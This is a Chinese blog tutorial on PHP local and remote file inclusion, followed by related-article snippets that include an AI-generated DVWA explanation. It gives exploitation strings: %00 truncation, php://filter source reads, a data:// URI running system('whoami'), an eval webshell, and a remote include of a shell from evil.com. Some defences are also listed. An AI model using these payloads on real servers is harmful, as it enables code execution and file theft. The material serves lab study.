网页文件包含漏洞(file inclusion)

最新推荐文章于 2025-05-19 11:43:12 发布
最新推荐文章于 2025-05-19 11:43:12 发布
阅读量1.3w 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: web 安全 安全 文章标签: web 安全 漏洞利用 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43178927/article/details/88857191
本文介绍Web开发中的文件包含漏洞,包括本地文件包含和远程文件包含。详细解释了PHP中导致此漏洞的函数,如include()、require()等,并提供了绕过过滤规则及利用远程文件的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web php 文件包含漏洞是“代码注入“的一种。代码注入的原理就是注入一段用户能控制的脚本或代码,并让服务端执行

常见的导致文件包含的函数如下:

PHP: include(), include_once(), require(),require_once, fopen(), readfile() ….

JSP/Servlet: ava.io.File(),java.io.FileReader() …

ASP:include file, include virtual…

PHP文件包含主要由这四个函数完成:

include()
require()
include_once()
require_once()

当使用这4个函数包含一个新的文件时,该文件将作为PHP代码执行,PHP内核并不会在意该被包含文件是什么类型。所以如果被包含的是txt文件、图片文件、远程URL,也都将作为PHP代码执行。

本地文件包含

在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,我们可以在文件名中使用%00进行截断,也就是说文件名中%00后的内容不会被识别,即下面两个url是完全等效的。

A http://ip/a.php?page=…\php.ini
B http://ip/a.php?page=…\php.ini%00xx.php

使用%00截断可以绕过某些过滤规则,例如要求page参数的后缀必须为php,这时链接A会读取失败,而链接B可以绕过规则成功读取

常用语法:

http://xx/								读取session文件

http://xx/xx.file						包含上传的附件

http://xx/error.log						包含错误日志

http://xx/	httpd.conf					获取web目录或者其他配置文件

http://xx/?page=file.txt%00xx.php			%00截断

http://xx/page=file:///c:/flagvalue.txt 		使用file:///path  查看文件

phpinfo()								 查看临时文件存放目录,包含临时文件

phar://压缩文件名/webshell.php			压缩webshell.php      				

http://?page=php://filter/read=convert.base64-encode/resource=xx.file

hints about php://filter

php://filter/source=<filename>		 读取文件内容
php://filter/read=string.toupper/source=<fileanme>`  
 将文件内容转换大写输出
 php://filter/read=string.tolower/source=<filename>`  
将文件内容转换小写输出
php://filter/read=string.strip_tags/source=<filename>	
去除文件内容中html标签输出
php://filter/read=convert.base64-decode/resource=<filename>
将文件内容base64解密后输出
php://filter/read=convert.base64-encode/resource=<filename>
将文件内容base64加密后输出

远程文件包含

选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件

http://xx/?page=data://text/plain,<?php system("whoami")?>

执行php 代码 system函数

http://xx/?page=data://text/plain;base64,base64Code

利用data URIs

data://image/jpeg;base64,...
详解文件包含漏洞
看不尽的尘埃——博客
11-19 644
简述 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web Applic...
DVWA之包含漏洞file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞利用方式、DVWA之包含漏洞file Inclusion
weixin_45116657的博客
09-10 3178
hahaha
File Inclusion(文件包含漏洞)
今天的风儿甚是喧嚣
07-10 755
文件包含漏洞总结
文件包含漏洞
最新发布
Rozooj的博客
05-19 224
文件包含漏洞引发文件泄露等安全问题
文件包含漏洞File Inclusion
Ethan024的博客
04-07 416
什么是文件包含文件包含是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如将一系列功能函数都写进function.php中,之后当某个文件需要调用的时候,就直接在文件头中写上一句<?php include function.php>就可以调用函数代码。 什么是文件包含漏洞: 由于网站功能需求,会让前端用户选择需要上传的文件(或者在前端的功能中使用“包含”功能)。又由于开发人员没有对包含的这个文件进行安全考虑,就导致攻
文件包含漏洞(File Inclusion)
diaomuxun8392的博客
08-21 426
简介 执行PHP文件时,可以通过文件包含函数加载另一个文件,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数,利用url去动态包含文件并解析执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页...
File Inclusion漏洞
qq_45106794的博客
11-04 487
File Inclusion 文件包含漏洞,是指服务器开启allow_url_include=on时,就可以通过php语言的某些特性函数(比如require()、include()等等)利用url去包含文件,此时如果没有对文件来源进行审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞 远程文件包含漏洞是由于allow_url_fopen=on(开启时),...
Pikachu靶场File Inclusion文件包含漏洞~保姆级教程!!!
2301_77360738的博客
05-17 1100
Pikachu文件包含漏洞,详细讲解本地文件包含和远程文件包含,保证一看就会,一学就懂,小白可入!!!
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
seanyang_的博客
10-26 636
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件中的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用中,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
DVWA—文件包含漏洞File Inclusion
qq_54537919的博客
06-27 1256
DVWA—文件包含漏洞File Inclusion
pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)
箭雨镜屋
02-12 9684
一、来自官方的简介 pikachu中文件包含漏洞的概述如下 那么在下文中,File Inclusion(local)关卡会尝试读取系统敏感信息,并结合文件上传漏洞包含图片马,获取webshell;File Inclusion(remote)关卡会尝试直接包含木马,以及包含写入木马的文件。 二、来自小可爱的通关步骤 第一关 File Inclusion(local) -------的地方是个下拉框, 第二关File Inclusion(remote) ...
如何确定自己的网站有安全漏洞
weixin_35757191的博客
01-08 790
要确定自己的网站有安全漏洞,可以考虑以下几种方法: 使用自动化安全测试工具来扫描网站。这些工具可以检测出常见的安全漏洞,如 SQL 注入、跨站脚本(XSS)攻击、密码破解等。 使用手动安全测试方法来检查网站。手动测试常见的安全漏洞包括手动发送请求来暴力破解密码,或者尝试提交恶意输入来检测 SQL 注入漏洞。 使用第三方安全公司来审核网站。第三方安全公司可以使用专业的工具和技术来扫描网站,并向...
Web安全-文件包含漏洞
道阻且长,行则将至
02-05 1616
概述 PHP文件包含 文件包含示例 (1)本地包含
web渗透-文件包含漏洞利用
weixin_45540964的博客
11-25 523
(1) .读取敏感文件 利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 @目标主机文件存在 (目标文件的绝对路径,相对路径) @具有文件的可读权限 提交参数 绝对路径 ?path=c:\路径\ 尝试相对路径 ?path=..\..\..\..\..\..\路径\ (2) .直接包含图片木马 将木马信息写入图片附加信息中 图片附加信息 版权等. <?php @eval($_REQUEST[777])?> 使用菜刀连接 (3
php Local File Inclusion利用方法汇总
note.txt
03-29 793
<br />看的国外的一个paper ,总结一下(截断统一不考虑):<br />1. 包含上传好的文件,jpg、txt、rar等允许的文件。<br />2. 包含各种日志。<br />3. 使用php wrapper,例如php://input、php://filter、data://等。<br />4. 包含 /proc/self/environ ,不熟悉linux,这个就靠大家了。<br />5. 包含SESSION文件,php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/wi
File Inclusion文件包含漏洞
陌茗228.的博客
04-11 269
File Inclusion: 当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once()利用url去动态包含文件 文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。 Low: 源代码: <?php // The page we wish to
DVWA之PHP文件包含漏洞File Inclusion
热门推荐
Mi1k7ea
03-08 1万+
文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~ 文件包含漏洞的一般特征如下: ?page=a.php ?home=a.html ?file=content 目录遍历(Directory
php文件包含漏洞 file inclusion vulnerability
whyrookie的博客
09-19 597
0x00 何为文件包含漏洞 开发人员如果在写类似include "a.php"的代码时,如果将a.php写成了可变的值,那么就可以在上面做文章,举个理想的例子: <? include $_GET['a'] ?> 此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了。 一个更具体的例子: 在访问一个页面时: 此图表明可以传入文件名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示文件内容,此即为...
文件包含漏洞特征详解
有勇气的牛排博客
07-29 956
1 介绍 更多文章:有勇气的牛排 — 攻防 如果允许客户端用户输入控制动态包含在服务器端的文件,会导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含和远程文件包含两种形式。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接) 2 基础 常见的文件包
DVWA靶场文件包含漏洞(File Inclusion)远程文件
04-03
<think>好的,我现在需要处理用户关于DVWA靶场中文件包含漏洞的远程利用和防御方法的问题。首先,我需要回忆文件包含漏洞的基本知识,特别是远程文件包含(RFI)的部分。根据用户提供的引用资料,特别是引用[3]和[4],远程文件包含需要allow_url_include配置开启,而DVWA的高级别可能已经关闭了这个选项。 接下来,用户想知道远程利用的方法。根据引用[4],当allow_url_include开启时,攻击者可以通过包含远程服务器上的恶意文件来执行代码。例如,使用http://或ftp://协议引入外部脚本。但需要注意,在DVWA的高级别设置中,可能已经对文件路径做了限制,比如必须以file://开头,如引用[5]提到的,这时候可能需要使用file://伪协议,但这是本地包含而非远程。 然后,关于防御方法,引用[1]提到使用绝对路径和避免动态包含,引用[2]和[3]讨论了白名单验证和关闭危险配置。需要综合这些信息,给出具体的修复建议,如输入验证、禁用远程包含等。 在生成相关问题的时候,要涵盖漏洞原理、利用条件、防御措施以及与其他漏洞的区别,确保问题全面。同时要检查引用标注是否正确,每个引用对应的内容是否准确。例如,引用[5]提到High级别使用file://开头,这可能影响远程包含的可能性,需要指出远程包含的条件是否满足。 最后,确保回答结构清晰,分点说明利用方式和防御方法,并正确引用相关来源。同时,验证LaTeX格式是否正确,但根据用户的问题,可能不需要数学公式,但如果有涉及变量或路径的地方,要使用$...$格式。例如,路径参数可以写成$_GET['page']$这样的形式。 总结步骤:1. 解释远程利用的条件和方法,引用相关材料;2. 列出防御措施,结合多个引用中的建议;3. 生成相关问题,覆盖漏洞的各个方面。</think>### DVWA 文件包含漏洞File Inclusion)远程利用及防御方法 #### 一、远程文件包含(RFI)利用方式 1. **利用条件** - PHP配置中需开启 `allow_url_include=On`(默认关闭,需手动修改`php.ini`)[^4]。 - 目标代码中存在动态包含用户可控参数的漏洞,例如 `include($_GET['page']);`。 2. **攻击步骤** - **构造恶意文件**:在远程服务器(如攻击者控制的站点)存放包含恶意代码的文件,例如 `http://evil.com/shell.txt`,内容为 `<?php system($_GET['cmd']);?>`。 - **触发包含**:通过URL参数注入远程文件路径,例如: ``` http://dvwa/vulnerabilities/fi/?page=http://evil.com/shell.txt&cmd=id ``` 若配置允许远程包含,服务器会加载并执行远程文件中的代码,实现命令注入[^4]。 3. **绕过限制** - 若High级别限制路径以`file://`开头(如DVWA的High级别),可通过伪协议`file://`结合路径遍历尝试本地文件包含(LFI),例如: ``` page=file:///var/www/html/config.php ``` 但此方式属于本地包含,非严格意义的远程利用[^5]。 --- #### 二、防御方法 1. **输入验证与白名单** - 对用户输入的包含路径进行严格校验,仅允许预定义的合法文件名(如`home.php`、`about.php`),拒绝包含外部路径或协议[^2][^1]。 2. **禁用危险配置** - 关闭PHP的远程文件包含功能:在`php.ini`中设置 `allow_url_include=Off` 和 `allow_url_fopen=Off`[^4]。 3. **使用绝对路径** - 避免动态拼接路径,改用硬编码的绝对路径,例如: ```php $allowed_pages = ['home' => '/var/www/html/home.php']; if (isset($_GET['page']) && array_key_exists($_GET['page'], $allowed_pages)) { include($allowed_pages[$_GET['page']]); } ``` 此方法彻底消除路径遍历风险。 4. **文件后缀限制** - 强制添加固定后缀(如`.php`),防止包含非预期文件类型: ```php $page = $_GET['page'] . '.php'; ``` 5. **代码隔离** - 将可包含文件存放在Web根目录外,避免通过URL直接访问敏感文件[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

键盘侠伍十七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值